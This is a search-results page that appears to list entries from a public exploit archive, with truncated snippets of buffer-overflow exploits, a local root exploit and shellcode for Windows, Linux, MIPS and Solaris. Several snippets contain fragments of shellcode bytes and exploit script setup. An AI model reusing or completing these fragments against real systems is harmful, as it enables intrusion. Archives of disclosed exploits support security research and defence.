7261 matches found
Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl Microsoft HTML Workshop = 4.74 Universal Buffer Overflow Exploit ----------------------------------------------------------------- Discovered/Exploit by SkD [email protected] ----------------------------------------------------------------- This ...
Steamcast - (HTTP Request) Remote Buffer Overflow Exploit (SEH) (2)
No description provided by source. !/usr/bin/python Usage : steamcast.py victimeip Bug : SteamcastHTTP Request Remote Buffer Overflow Exploit SEH 2 Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln. Tested on : Xp sp2 fr Exploited by : His0k4 Greetings : All friends &...
Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
No description provided by source. / Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include stdio.h char sc = \x24\x0f\xff\xfd // li t7,-3 \x01\xe0\x20\x27 // nor a0,t7,zero \x01\xe0\x28\x27 // nor a1,t7,zero \x28\x06\xff\xff // sl...
Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit 2
No description provided by source. / name: streamripper = 1.61.25 win32 remote exploit bug by: Ulf Harnhammar status: public exploit: psylocn payload: portbind 4444 K:\exploit.exe 80 0 public-release streamripper = 1.61.25 remote exploit exploit by psylocn 2006 bug by Ulf Harnhammar + server...
Linux Kernel 2.6.29 - ptrace_attach() Local Root Race Condition Exploit
No description provided by source. / GNU/Linux kernel 2.6.29 ptraceattach local root race condition exploit. ========================================================================== This is a local root exploit for the 2.6.29 ptraceattach race condition that allows a process to gain elevated...
MediaCoder 0.7.3.4605 - Local Buffer Overflow Exploit
No description provided by source. / Download: http://www.mediacoderhq.com/download.htm Compilation: mediac.c.......Win32cygwin,Devcpp Tested on Windows xp sp3 Date: 24.02.2010 1.We get control of EIP by overwriting a seh handler with pop pop retn instr and pass exception. 2.We position shellcode...
PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit
No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / // // ||||,||| ,|||||||,| || |||||| // // // // Proof of concept code from the Hardened-PHP...
CA Internet Security Suite 2010 - KmxSbx.sys Kernel Pool Overflow (0day)
No description provided by source. / Exploit Title: CA Internet Security Suite 2010 KmxSbx.sys Kernel Pool Overflow 0-day Exploit Date: 2010-11-28 Author: Nikita Tarakanov CISS Research Team Software Link: http://shop.ca.com/ca/products/internetsecurity/internetsecuritysuite.asp Version: up to...
Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute
No description provided by source. Magneto ICMP ActiveX v4.0.0.20 ICMPSendEchoRequest Remote Code Execute Date: 2011-5-27 Discovered by: boahat vendor: http://www.magnetosoft.com/ Download: http://www.magnetosoft.com/downloads/skicmpsetup.exe SKIcmp.ocx Function ICMPSendEchoRequest ByVal...
Winamp 5.572 - whatsnew.txt Local Buffer Overflow Exploit WinXP SP3 De
No description provided by source. Tested on: WinXP SP3 De !/usr/bin/perl Still learning, having some fun... Greetz to -Sid- Roadkill Jess Dawn Linki Special greetz do Debug, even i dont know you. Nice find man. Exploit has something around 70% chance of success. print \n\n; print Winamp 5.572...
CoolPlayer 2.18 - M3U Playlist Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl Versions affected: 2.18 Tested on: Windows XP Pro SP2 Author: data$hack Usage: expl.pl my $file= exs3.m3u; my $junk= A x 223; my $eip = pack'V',0x7C836940; jmp esp from kernel my $shellcode = \x90 x 10; $shellcode = $shellcode...
Find all writeable folder in filesystem linux polymorphic shellcode - 91 bytes
No description provided by source. / Title : Find all writeable folder in filesystem linux polymorphic shellcode . Name : 91 bytes Find all writeable folder in filesystem linux polymorphic shellcode . Date : Sat Jun 17 21:27:03 2010 Author : gunslinger yudha.gunslingeratgmail.com Web :...
Solaris 7.0/8 Xsun Buffer Overrun Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1140/info A buffer overrun vulnerability exists in the Xsun X11 server, as shipped as part of Solaris 7 and 8 from Sun Microsystems. By supplying a long argument to the -dev option normally used to set the output device, ...
Chasys Media Player 1.1 - (.pls) Stack Overflow Exploit (2)
No description provided by source. !/usr/bin/python Chasys Media Player 1.1 .pls Stack Overflow Exploit By: Encrypt3d.M!nd Credit flys to: zAx the good thing in this one that the program won't crash when the playlist file imported,and will keep running. header =...
AoA DVD Creator 2.6.2 - ActiveX Exploit
No description provided by source. !-- Exploit Title: AoA DVD Creator ActiveX Date: 19.05.2014 Author: metacom Website: www.rstforums.com Software Link: www.aoamedia.com/aoadvdcreator.exe Version: 2.6.2 Tested on: Windows xp sp3EN IE 6.0 -- html object...
linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes
No description provided by source. / linux/x86 setreuid0, 0 + execve/bin/sh, /bin/sh, NULL, NULL - 31 bytes - izik [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx,%ebx \x31\xc9 // xor %ecx,%ecx \xcd\x80 // int $0x80 \x99 // cltd \xb0\x0b // mov...
CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow
No description provided by source. !/usr/bin/perl Exploit Title: CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow Discovery date: 11-26-2013 Exploit Author: Mike Czumak Tv3rn1x -- @SecuritySift Vulnerable Software/Version: CyberLink Power2Go 9 Essential 9.0.1002.0...
Local Glibc shared library (.so) <= 2.11.1 exploit
No description provided by source. Exploit Title: Local Glibc shared library .so exploit Date: 07.04.10 Author: Rh0 [email protected] Software Link: NA Version: = 2.11.1, higher not tested Tested on: Debian stable x86-64, Ubunutu 9.10 x86, Fedora 12 x86 CVE : NA Code : !/bin/sh A lot of applications in...
Solaris/x86 - Halt shellcode - 36 bytes
No description provided by source. / Title: Solaris/x86 - Halt shellcode - 36 bytes Auhtor: Jonathan Salwan submit AT shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan Date: 2010-05-20 Tested: SunOS opensolaris 5.11 snv111b i86pc i386 i86pc Solaris !Databa...
SHOUTcast <= 1.9.4 File Request Format String Exploit (Leaked)
No description provided by source. / Shoutcast = 1.9.4 exploit by crash-x Trys to upload the shellcode to a fixed address and execute it. This exploit was not written bei Simon 'Zodiac' Moser segfault.ch. / include stdio.h include stdlib.h include stdarg.h include string.h include sys/types.h...